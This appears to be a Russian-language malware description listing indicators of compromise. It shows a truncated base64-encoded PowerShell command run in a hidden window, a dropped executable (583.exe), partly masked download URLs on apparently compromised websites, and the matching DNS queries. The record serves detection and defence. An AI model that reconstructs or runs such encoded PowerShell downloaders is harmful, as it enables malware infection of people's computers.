Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAFoAQwBSAE8AeQBoAGkAPQAnAFoAQQBHAFEASABuAHYAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBgAFUAcgBJAFQAeQBgAFAAUgBvAGAAVABPAGMAYABvAEwAIgAgAD...
- %HOMEPATH%\583.exe
- %HOMEPATH%\583.exe
- %HOMEPATH%\583.exe
- http://www.gr####studio.com/docs/olohz_suq_munasyr/
- http://www.gr####records.com/wp-admin/5h_jns_l3s6/
- http://gt##uth.com/drinkmenu/38vq_z8al_r5cujfy90n/
- http://gr###rete.com/bower_components/cvbh8_f0_84rai/
- http://gr###rete.com/cgi-sys/suspendedpage.cgi
- http://www.gu###oluk.com/eotps/heb_x_1ehlbx9/
- DNS ASK gr####studio.com
- DNS ASK gr####records.com
- DNS ASK gt##uth.com
- DNS ASK gr###rete.com
- DNS ASK gu###oluk.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAFoAQwBSAE8AeQBoAGkAPQAnAFoAQQBHAFEASABuAHYAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBgAFUAcgBJAFQAeQBgAFAAUgBvAGAAVABPAGMAYABvAEwAIgAgAD...' (со скрытым окном)